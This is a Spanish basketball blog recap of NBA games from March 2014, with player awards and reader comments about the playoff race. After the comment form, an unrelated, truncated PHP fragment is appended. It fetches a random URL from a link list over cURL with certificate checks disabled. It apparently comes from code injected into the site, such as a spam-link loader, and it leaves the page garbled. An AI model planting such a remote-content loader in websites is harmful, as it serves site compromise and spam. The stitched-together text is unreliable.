La Crónica: La plaza inalcanzable

06 de March de 2014 por TheDeerHunter

Terminó la racha de triples de Kyle Korver como ya habéis comentado a primera hora de la mañana. Anoche fallaba sus 5 intentos  y de mostró tan inoperante como todo su equipo que no llegaba ni a los 80 puntos ante unos Blazers al tran-tran (78-102). La marca de Korver se queda en 127, nada fácil de superar.

Lo más noticioso es que los Hawks parecen ir a por su propio récord de derrotas (12 de los últimos 13 partidos) pero ni por esas nadie es capaz de birlarles la 8ª plaza de conferencia. Los que más cerca han estado de hacerlo, los Pistons, están casi tan acertados como los propios Hawks. Anoche Noah les endosó otro triple doble y junto a Augustin, Gibson y Butler se combinaron para anular el gran partido de Monroe (105-94). Esta extraña competición de deméritos en la cola de playoffs del Este le da vidilla a New York, que anoche ganaba en Mineapolis a otro equipo con sus propios problemas para acercarse a la 8ª plaza de conferencia (118-106). Alucinante ver a 6 tíos en dobles figuras en los Knicks que, además, les vino estupendo el flojo partido de Love. Cuando los Wolves se ponen por encima del 50% les entra el pánico. 

Otros con la maldición de la 8ª plaza inalcanzable son los Grizzlies. Anoche Zach fue baja por sorpresa con fiebre y Marc se vio demasiado solo. 6 puntos con 2 de 17 en tiros del resto de los titulares. El banco maquilló un poco el resultado pero los Nets dominaron de principio a fin (94-103). Gran acierto exterior de la dupla Joe Johnson-Marcus Thornton y Brooklyn que se pone por encima del 50% por primera vez en todo el curso.
Antes, los Mavs habían dejado la 8ª plaza del Oeste en bandeja a los Grizzlies perdiendo su tercer partido seguido ante, nada menos, que Denver (110-115). De psiquiatra.

Pero la sorpresa de la jornada fue la sobrada victoria de los Bobcats ante Indiana. Como esta gente nos lee, Al Jefferson se destapó con una actuación de MVP y Paul George naufragó ante MKG, “la víctima de los 61”. Segunda derrota consecutiva de Indiana quienes también parecen preferir enfrentarse a los campeones con desventaja de campo (87-109).

En el resto de jornada poca historia. Los Rockets tuvieron que tirar de remontada en Orlando (101-89); los Warriors se pasearon en el Garden de Boston (108-88), y sólidas victorias de los Wizards ante Jazz (91-104) y de Sacramento en Milwaukee (116-102).

PREMIOS

MVP: Al Jefferson sigue demostrando la injusticia que suposo su no presencia en el All Star. Desde aquel día promedía 26 puntos y 10’3 rebotes por partido. Ayer, se cargó a los Pacers con 34 puntos, 8 reboets y 3 asistencias.

Rookie: Minutitos para Ray McCallum que aprovechó con 15 puntos y 4 rebotes. Kelly Olynyk fue el mejor de los Celtics con 19 puntos, 5 rebotes y 3 asistencias y Cody Zeller anotó 11 puntos y capturó 5 rebotes ante los Pacers.

Sorpresa: Partido de los que no se le recuerdan a Raymond Felton. 18 puntos (con un 5 de 8), 8 asistencias y 4 robos.

Decepción: Terrible partido de Mike Conley. Falló los 8 tiros que intentó, se quedó en 2 puntos y perdió 6 balones. También hubiera sido mejor que no se hubiera quedado en la cama Paul George que acabó el partido con 5 pérdidas y un 0 de 9 en tiros de campo.

Esfuerzo en vano: Los 27 puntos, 7 rebotes, 5 asistencias y 2 robos de Greg Monroe no sirvieron de nada ante el juego de los Bulls. ¿Abandonará los Pistons en verano o no? Se aceptan apuestas.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. Nacho dice:
    #1

    David Stern ha dicho que si de él dependiera le daba la última plaza de PO del este a un equipo del oeste. Incluso las dos últimas.

    La verdad es que molaría, pero no sé si lo ha dicho Stern.

    Por otro lado cagada de los Wolves, ya aventuraba que una racha de 7 a 1 en estos partidos de la 1ª quincena de marzo iba a ser didícil, aún pueden, pero NYK es una derrota que duele, viniendo de donde venían los neoyorkinos. Aunque aún pueden ganar los próximos cinco partidos y achuchar a los de delante.

    No sé por qué, pero me da la impresión que Nets y Bulls se van a estar mirando para evitarse en primera ronda. De momento lo llevan bien. Sería bueno que lo hicieran, porque son los dos únicos equipos que pueden hacer cosquillas a los gallitos en segunda ronda.

      Citar

  2. Esteban dice:
    #2

    Cody Zeller empieza a carburar, en 2014 ya ha tenido varios partidos como el de ayer, donde si bien no sobresale, al menos tiene un aporte importante que hace ver su futuro con otros ojos

      Citar

  3. Esteban dice:
    #3

    viendo el recap de Bobcats y Pacers, que golpe al ego de Hibbert quien pretende ser el defensor del año, necesitar ayuda para doble marcar a Jefferson y aun así quedar en ridiculo

    sobre MKG, ayer se vio algo de su buena defensa, los 62 y 61 seran un estigma que le costara sacarse pero ayer al menos parecio no importarle

      Citar

  4. rumbero dice:
    #4

    Nacho:

    Por otro lado cagada de los Wolves, ya aventuraba que una racha de 7 a 1 en estos partidos de la 1ª quincena de marzo iba a ser didícil, aún pueden, pero NYK es una derrota que duele, viniendo de donde venían los neoyorkinos. Aunque aún pueden ganar los próximos cinco partidos y achuchar a los de delante.

    Ya lo avisabas el fin de semana y te han dado la razón. Si estando tan lejos no aprovechan estas jornadas donde el resto pinchan, adiós a cualquier esperanza. Y contra estos Knicks, en casa y recibiendo 120 puntos. Para tirarse de los pelos estos Wolves y más cuando ves que en el mes de febrero Love ha promediado 34 puntos 14 rebotes 48%FG 41%3P. De locos

      Citar

  5. Ruxixon dice:
    #5

    A estos Timberwolves les beneficia que Ricky mande en el partido,con K.Martin y/o Pekovic de vuelta al quinteto vuelven a reflotar las sensaciones negativas de toda la temporada.Resulta paradójico pero han jugado mejor durante las bajas de estos jugadores.Para mí el proyecto Adelman-Love,tras esta derrota,está acabado,y posiblemente se vean favorecidos por el número de partidos que aún les quedan como locales,pero no creo en los milagros.Dudo incluso que en esa racha que comenta Nacho se de cuando te visitan los Raptors,que te llevan los partidos a lo que les interesa a ellos,o tienes que ir a jugar contra los Bobcats que están de dulce.

      Citar

  6. rumbero dice:
    #6

    Y ese banquillo una vez más… Parece injusto darle palos a la segunda unidad pero es una realidad. Me ha dado por ver el partido y ves como se pasan remando en el 2º y 3r cuarto para recortar distancias y Adelman empieza el último a 2 puntos con Barea, Muhammad, Budinger, Cunningham y Pek…y en 4 minutos palmando ya de 11. Entre eso y los finales apretados han dejado escapar la posibilidad de PO

      Citar

  7. HisRoyalAirness dice:
    #7

    Sabéis que no he podido defender más a mis lobeznos durante este par de años y al animal de Kevin Love. Pero los diferenciales en defensa y la efectividad defensiva de Love y Pekovic a sus pares son de los peores de la liga. Me jode decirlo pero es así, son estadísticas de ESPN y varias páginas ya he leído un par de artículos al respecto. No seré yo quien desmerezca a Love o a Pek pero creo que son algo incompatibles. KL con un pivot defensivo al lado sería tremendo. Aunque si los Wolves pierden a Pekovic sólo anotarían 2. Es una pena porque verles jugar en fase ofensiva es una maravilla

      Citar

  8. Vader dice:
    #8

    Ayer Raymond Felton sacó la pistola…

      Citar

  9. Ruxixon dice:
    #9

    HisRoyalAirness:
    Sabéis que no he podido defender más a mis lobeznos durante este par de años y al animal de Kevin Love. Pero los diferenciales en defensa y la efectividad defensiva de Love y Pekovic a sus pares son de los peores de la liga. Me jode decirlo pero es así, son estadísticas de ESPN y varias páginas ya he leído un par de artículos al respecto. No seré yo quien desmerezca a Love o a Pek pero creo que son algo incompatibles. KL con un pivot defensivo al lado sería tremendo. Aunque si los Wolves pierden a Pekovic sólo anotarían 2. Es una pena porque verles jugar en fase ofensiva es una maravilla

    Tienes toda la razón,ambos se beneficarian con un jugador netamente defensivo a su lado.Lo mejor es que Pekovic es buen jugador,no es un jugador franquicia,está claro,pero pensando en unos Timberwolves sin Love,Pek es un jugador más que válido para iniciar un nuevo proyecto,amén de que habría que hacer un trabajo de chinos para rodear a Ricky y al pívot de otros jugadores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>